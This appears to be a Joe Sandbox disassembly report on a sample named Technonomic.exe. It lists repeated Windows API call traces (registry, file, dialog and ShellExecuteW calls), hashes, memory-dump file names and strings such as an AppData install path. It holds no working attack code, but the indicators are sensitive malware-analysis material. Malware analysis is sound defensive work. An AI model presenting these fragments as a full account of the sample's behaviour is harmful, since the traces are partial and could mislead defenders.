                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                      • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                                      • Instruction ID: 23ec5f7379bf279edb3dbb3262258d5736cfdadd2d5b14d2449b9c6e52f850f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                                                                                                                                      • Instruction Fuzzy Hash: 4DE08C3224021EABCF109F50CC08EEB3B6CEB00360F044432FA99E2080D230EA209BE4
                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Open
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                      • Opcode ID: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                                                                                      • Instruction ID: 027cd1837f043f16bcd3791d2c18ee9a5769249626570c171517a7e702d59ee3
                                                                                                                                                                      • Opcode Fuzzy Hash: 6de8d722f9b5cde2e8321ff20ccbb9f3bd30598b393325d5ca99ac671e434b38
                                                                                                                                                                      • Instruction Fuzzy Hash: 17E0EC76254108BFDB10EFA9EE4BFE97BECAB44704F008435BA09E70E1C674E5509B69
                                                                                                                                                                      APIs
                                                                                                                                                                      • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,0040336B,?,?,0040326F,00414EF0,00004000,?,00000000,00403119), ref: 00405DEF
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                      • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                                                      • Instruction ID: 619b4f5876fe922fe119770d1c4b6382a551d6d1c0a67235faeb4c306daddfa0
                                                                                                                                                                      • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                                                                                                                                      • Instruction Fuzzy Hash: BAE08C3220021AABCF10AF90CC04AEB3B6CEB083A0F004833F951E3140D230E9618BE4
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                      • Opcode ID: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                                                                                      • Instruction ID: 2f2862f802f4bb8c259b254183006bf3f0de574643f6f04ef9dece27a841d158
                                                                                                                                                                      • Opcode Fuzzy Hash: 5756958af50dd38891c3069a2751d27f69ae340bed3483b9d05a16c22411fa1f
                                                                                                                                                                      • Instruction Fuzzy Hash: 24C04C71740600BBDA208B509E45F1677546754740F1448697740A50E0C674E410D62D
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FilePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                                                      • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                                                      • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                                                                                      • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                                                                                      • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                                                                                      APIs
                                                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,004040A8), ref: 0040428A
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                      • Opcode ID: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                                                                                      • Instruction ID: 7863800e542b6cbc8ec812c2a21dbba0b6cde8a84852b126545aa60b8f7f929b
                                                                                                                                                                      • Opcode Fuzzy Hash: 4fda07dd220d348ff9e627888b9912082cf8e79b7c773bcb1828ccca34d8a7b3
                                                                                                                                                                      • Instruction Fuzzy Hash: 13B01235285A00FBDE214B00EE09F457E62F76CB01F008478B340240F0CAB300B1DF19
                                                                                                                                                                      APIs
                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00404041), ref: 00404273
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                                                      • Opcode ID: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
                                                                                                                                                                      • Instruction ID: 08295bde0fd8e02eb16c20732bdcb1eb6333efd9321479dd2e2322931d05c33c
                                                                                                                                                                      • Opcode Fuzzy Hash: c0b3a243f11644889afe8cb27eda9c0353b0d621d2840f40823c674b46be75ab
                                                                                                                                                                      • Instruction Fuzzy Hash: ADA001B6644500ABCE129F90EF49D0ABB72EBE4B02B518579A285900348A365961FB59
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404C76
                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404C81
                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CCB
                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404CDE
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405256), ref: 00404CF7
                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D0B
                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D1D
                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D33
                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3F
                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D51
                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404D54
                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7F
                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D8B
                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E21
                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E4C
                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E60
                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404E8F
                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E9D
                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404EAE
                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FAB
                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405010
                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405025
                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405049
                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405069
                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040507E
                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 0040508E
                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405107
                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004051B0
                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BF
                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004051DF
                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040522D
                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405238
                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040523F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                                      • Opcode ID: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                                                                                      • Instruction ID: 46f3c2dfcfe7d78df06ebec09318e15d32e2b04993d9507e8b01d99ed80ca2ca
                                                                                                                                                                      • Opcode Fuzzy Hash: 8b7898f8f49f67d995be691c5ed78805e405c898658afbb61a3d1b4db651d7df
                                                                                                                                                                      • Instruction Fuzzy Hash: CA026EB0A00209AFDF209F65DD45AAE7BB5FB44314F10817AF610BA2E1C7799E52CF58
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404731
                                                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040475B
                                                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040480C
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404817
                                                                                                                                                                      • lstrcmpiW.KERNEL32(: Completed,00423748,00000000,?,?), ref: 00404849
                                                                                                                                                                      • lstrcatW.KERNEL32(?,: Completed), ref: 00404855
                                                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404867
                                                                                                                                                                        • Part of subcall function 004058AC: GetDlgItemTextW.USER32(?,?,00000400,0040489E), ref: 004058BF
                                                                                                                                                                        • Part of subcall function 00406417: CharNextW.USER32(0040A230,*?|<>/":,00000000,"C:\Users\user\Desktop\Technonomic.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040647A
                                                                                                                                                                        • Part of subcall function 00406417: CharNextW.USER32(0040A230,0040A230,0040A230,00000000), ref: 00406489
                                                                                                                                                                        • Part of subcall function 00406417: CharNextW.USER32(0040A230,"C:\Users\user\Desktop\Technonomic.exe",76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 0040648E
                                                                                                                                                                        • Part of subcall function 00406417: CharPrevW.USER32(0040A230,0040A230,76F93420,C:\Users\user\AppData\Local\Temp\,00000000,00403391,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 004064A1
                                                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 0040492A
                                                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404945
                                                                                                                                                                        • Part of subcall function 00404A9E: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                                                                                        • Part of subcall function 00404A9E: wsprintfW.USER32 ref: 00404B48
                                                                                                                                                                        • Part of subcall function 00404A9E: SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                      • String ID: : Completed$A$C:\Users\user\AppData\Local\magmaet\clenched$H7B
                                                                                                                                                                      • API String ID: 2624150263-1828903364
                                                                                                                                                                      • Opcode ID: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                                                                                      • Instruction ID: 9c6f5067bad78934a321292c7affeb857c6c8b78ef178650078e6910c23b8850
                                                                                                                                                                      • Opcode Fuzzy Hash: 29b82d879f89b335d801dd70145edd0b5915db95dd8f44cbea82b22297ec7ec8
                                                                                                                                                                      • Instruction Fuzzy Hash: D8A183F1A00208ABDF11AFA5CD45AAFB7B8EF84314F10843BF611B62D1D77C99418B69
                                                                                                                                                                      APIs
                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404482
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404496
                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044B3
                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004044C4
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044D2
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044E0
                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 004044E5
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044F2
                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404507
                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 00404560
                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 00404567
                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404592
                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045D5
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 004045E3
                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004045E6
                                                                                                                                                                      • ShellExecuteW.SHELL32(0000070B,open,00428200,00000000,00000000,00000001), ref: 004045FB
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404607
                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040460A
                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404639
                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464B
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
